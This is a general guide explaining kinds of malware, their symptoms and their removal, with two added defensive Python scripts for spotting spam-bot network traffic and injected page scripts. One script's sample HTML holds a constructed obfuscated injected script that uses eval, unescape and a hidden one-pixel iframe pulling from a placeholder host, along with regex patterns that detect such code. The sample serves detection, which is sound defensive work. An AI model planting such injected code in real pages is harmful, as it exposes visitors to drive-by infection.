What is Malware?
Synopsis
Malware is the overall term given to a range of nasties including viruses, trojans, fake AV packages and pretty much anything that wants to hurt you or your machine in some way.
Description
Malware is a catch-all phrase which encompasses lots of genres, many of which are very similar or overlapping, and some 'packages' use a combination of them to spread. Here is a short glossary of common words used when talking about malware.
Payload
Most malware has a reason to exist, and this is known as its 'payload', e.g. a virus infects your machine to install a trojan which will then allow someone outside to access your machine (the trojan in this case being the payload). A payload could be spyware, a spamming agent or a keylogger. Some payloads are designed specifically for individuals or for very specific operating systems.
Worms
A worm is a self-replicating piece of software: it infects a machine and creates a copy which then infects another machine via the network - it needs no interaction from the user. One of the first worms, Morris, which hit the internet in 1988, was apparently not deliberate but written as a way to gauge the size of the internet. Firewalls and better security in the operating system have made worms much less likely now, but when the Morris worm hit the internet it caused network blackouts and blockages, not because it meant to but because of the sheer amount of data being moved between computers trying to infect each other.
Viruses
Similar to worms, these are self-replicating, but they transmit differently. They normally infect files which, when accessed, cause the virus to run. The virus does the thing it was designed for (maybe dropping a trojan or turning your computer into a spambot - see below) and also tries to infect other files. Eventually it may find its way into a file that is sent, emailed, copied to USB or otherwise accessed by another machine. At this point the process starts again.
Trojans
Trojans are payloads. The name is based on the Trojan Horse story, as effectively a trojan is granted access to your computer somehow (either by a virus or by you downloading it by mistake). Like in the story, once inside they open ports, disable security settings, send packets of information onto the internet etc., allowing bad people to access your machine with ease.
Spyware
Spyware comes in two main forms: the first as a payload (delivered directly by a virus/worm or by drive-by download), the second installed on your machine as part of another package. You may be installing a utility whose author has done a deal with a monitoring company to install their software at the same time; this is considered a grey legal area, but most anti-virus packages will treat it as malware and remove it. The spyware monitors your surfing habits, your usernames and passwords etc. and then uses them either to target advertising at you or to hack into your accounts.
Adware
Adware is software that shows you popups or injects advertising into web pages. It often comes hand in hand with spyware and is similar in that it can be installed by mistake (or without your knowledge).
Keyloggers
Keyloggers are a security-related piece of malware. They monitor what you are typing and then send a packet of information off to a central location - for example, your username, password and PIN are logged when you type them into your bank's website. The third party will use them to access your account. They are very dangerous, and you should contact your bank if one has been removed from your machine, just in case.
Zombie / Spam Bots
A zombie machine is created when malware has infected your machine and the payload uses your machine to spam (send advertising emails to) internet users and to spread itself to other machines. This is becoming a major issue on the internet, with some botnets (networks of zombie machines) reaching millions of computers. Using encrypted pathways between them, they can be used to launch attacks on websites by overwhelming the server with millions of simultaneous requests. These networks are normally run by organised crime (mafia etc.).
Drive-By-Download
When you visit a website your computer is actually looking at various documents which are combined to make a nice-looking page. Your computer must run scripts or programs to do this - a drive-by download is when your computer opens the page and runs the script, but the script has been hijacked. When the script is run, the computer downloads a payload (often a rogue antivirus) and installs it.
Rootkits
Rootkits are normally found in system files or in the boot sector of the hard drive. They are very difficult to remove. By infecting these parts of the operating system and computer, they are able to run before or early in the Windows boot process. They are able to hide themselves from anti-virus packages, as they effectively control the flow of data around the computer. Some rootkits cannot be removed even by reinstalling Windows.
Rogue Antivirus or Scareware
This is the single biggest form of malware in the last few years.
Symptoms
Slow computer, crashing, lots of network or disk activity when you are not doing anything. You might get blatant advertising every time you visit a website, or doing a search on Google or Bing returns porn or random rubbish.
Some malware just slows everything down or causes random problems, but you might not even notice well-written malware.
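The "lots of network activity when you are not doing anything" symptom above, and the spam-bot behaviour described under Zombie / Spam Bots, can be checked rather than guessed at. The following is an added example, not code from the original page: a small Python script that reads the text output of the Windows 'netstat -ano' command and summarises outbound TCP connections per process, flagging any process holding several connections to mail ports or talking to an unusually large number of remote hosts. The sample netstat output is constructed (documentation address ranges, made-up PIDs), and the thresholds are assumptions chosen for the demonstration.

```python
"""Added example (not part of the original page): summarise 'netstat -ano'
output per process to spot spam-bot-like outbound activity.
The sample text and the thresholds below are constructed assumptions."""
from collections import defaultdict

MAIL_PORTS = {25, 465, 587}   # SMTP ports a spam bot would use to send mail

# Constructed sample of Windows 'netstat -ano' output (not a real capture).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    192.168.1.20:49712     198.51.100.7:443       ESTABLISHED     4120
  TCP    192.168.1.20:49801     203.0.113.10:25        ESTABLISHED     5588
  TCP    192.168.1.20:49802     203.0.113.11:25        ESTABLISHED     5588
  TCP    192.168.1.20:49803     203.0.113.12:25        SYN_SENT        5588
  TCP    192.168.1.20:49804     203.0.113.13:587       ESTABLISHED     5588
  TCP    [::1]:49900            [::1]:445              ESTABLISHED     4
  UDP    0.0.0.0:5353           *:*                                    1732
"""


def parse_netstat(text):
    """Return (proto, local, remote, state, pid) tuples from netstat -ano text.
    UDP lines have no State column, so they carry four fields, not five."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue   # skip the banner, the header and blank lines
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, remote, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, remote, pid = parts
            state = ""
        else:
            continue   # malformed line: ignore it rather than guess
        rows.append((proto, local, remote, state, int(pid)))
    return rows


def split_host_port(addr):
    """'203.0.113.10:25' -> ('203.0.113.10', 25); '[::1]:445' -> ('::1', 445)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def summarise(rows, mail_threshold=3, remote_threshold=20):
    """Per PID: outbound TCP connection counts, distinct remote hosts and
    mail-port connections, plus a 'suspicious' flag based on the thresholds."""
    per_pid = defaultdict(lambda: {"outbound": 0, "remotes": set(), "mail": 0})
    for proto, _local, remote, state, pid in rows:
        if proto != "TCP" or state == "LISTENING":
            continue
        host, port = split_host_port(remote)
        if host in ("0.0.0.0", "::", "::1") or host.startswith("127."):
            continue   # local-only traffic is not what we are looking for
        entry = per_pid[pid]
        entry["outbound"] += 1
        entry["remotes"].add(host)
        if port in MAIL_PORTS:
            entry["mail"] += 1
    report = {}
    for pid, e in per_pid.items():
        suspicious = e["mail"] >= mail_threshold or len(e["remotes"]) >= remote_threshold
        report[pid] = {"outbound": e["outbound"],
                       "distinct_remotes": len(e["remotes"]),
                       "mail_connections": e["mail"],
                       "suspicious": suspicious}
    return report


if __name__ == "__main__":
    for pid, e in summarise(parse_netstat(SAMPLE_NETSTAT)).items():
        flag = "SUSPICIOUS" if e["suspicious"] else "ok"
        print(f"PID {pid}: {e['outbound']} outbound, {e['distinct_remotes']} hosts, "
              f"{e['mail_connections']} mail-port connections -> {flag}")
```

On a real machine you would run 'netstat -ano' in a Command Prompt, save the output to a file, pass that text to parse_netstat, and then look up any flagged PID in Task Manager to see which program owns it. A mail client legitimately holds one or two connections to its own server on port 587, which is why the check counts several simultaneous mail-port connections rather than any single one.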
Causes
Historically, the biggest problems came via the network connection or via directly downloaded files (e.g. from websites). Nowadays, most malware comes in via websites that have either been hacked or are run by the bad guys - they place hidden code into the fabric of the page which causes you to install the malware (this is called drive-by downloading). A lot of this can be prevented by not clicking on dodgy links, visiting porn sites or following any link that a non-friend has sent you (although, increasingly, Facebook accounts are being hacked and used to send known friends dodgy links).
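The "hidden code placed into the fabric of the page" mentioned here, and the hijacked script described under Drive-By-Download, is something a defender can look for in a saved copy of a suspect page. The following is an added example, not code from the original page: a Python script that pulls the scripts out of an HTML document with the standard library parser, lists the external script sources, and flags inline scripts showing the usual signs of injected, obfuscated code (eval and unescape calls, long runs of hex escapes, document.write, one-pixel iframes). The sample HTML is constructed for the demonstration, and the indicator list and regular expressions are assumptions, a starting point for inspection rather than a definitive test of malice.

```python
"""Added example (not part of the original page): extract the scripts from a
saved HTML page and flag inline scripts with signs of injected code.
The sample page and the indicator patterns below are constructed assumptions."""
import re
from html.parser import HTMLParser

# Constructed sample page: two normal scripts plus one obfuscated inline block
# of the kind that gets injected into a hacked site (evil-host.invalid is a
# reserved placeholder name, not a real host).
SAMPLE_HTML = """<html><head><title>Shop</title>
<script src="/js/app.js"></script>
<script src="//cdn.example/jquery.min.js"></script>
</head><body>
<script>console.log("page ready");</script>
<script>var _0x1a=["\\x68\\x74\\x74\\x70"];eval(unescape("%75%6e%65"));document.write('<iframe width=1 height=1 src="http://evil-host.invalid/x"></iframe>');</script>
</body></html>"""

# Indicators commonly seen in injected scripts; names are sorted in the output.
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "hex_escapes": re.compile(r"(\\x[0-9a-fA-F]{2}){4,}"),   # 4+ consecutive \xHH
    "hidden_iframe": re.compile(r"<iframe[^>]*(width|height)=\"?[01]\b", re.I),
    "document_write": re.compile(r"document\.write\s*\("),
}


class ScriptCollector(HTMLParser):
    """Collect external script sources and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        # Script content may arrive in several chunks; collect them all.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def inspect_page(html):
    """Return external script URLs and, per inline script, the indicators hit."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for index, body in enumerate(collector.inline):
        hits = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(body))
        findings.append({"index": index, "length": len(body), "indicators": hits})
    return {"external": collector.external, "inline": findings}


if __name__ == "__main__":
    result = inspect_page(SAMPLE_HTML)
    print("External scripts:", result["external"])
    for f in result["inline"]:
        print(f"inline script #{f['index']} ({f['length']} chars):",
              f["indicators"] or "no indicators")
```

Any external script source you do not recognise, and any inline script that hits several indicators at once, deserves a closer look; a single hit (document.write on its own, say) is common in ordinary pages, so the script reports the indicators and leaves the judgement to the reader.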
Prognosis
Good! Most malware can be removed without any worry. Some is written deliberately to damage your operating system or cause as much difficulty as possible, but this is not as frequent now, as most malware is money orientated and needs you to keep using the computer. Often it is the interaction of malware with other malware or with anti-virus packages that causes trouble (like damaging your registry).
If you can, back up your files as soon as possible and scan the files with different antivirus packages before opening them on a new computer, or you might spread the infection.
Treatment
Depending upon what sort of malware you have, you might simply need to run a good quality anti-virus package. If it's a nasty one, you may need to boot into safe mode or perform scans with the drive in a slave configuration (attached as a secondary drive to a clean machine). If you are reading this guide and you have tried the basic option, it's time to visit a repair shop or a knowledgeable friend.
You never need to lose data, so don't fall for wiping your drive to remove the malware; some malware (rootkits) actually survives a reinstall anyway.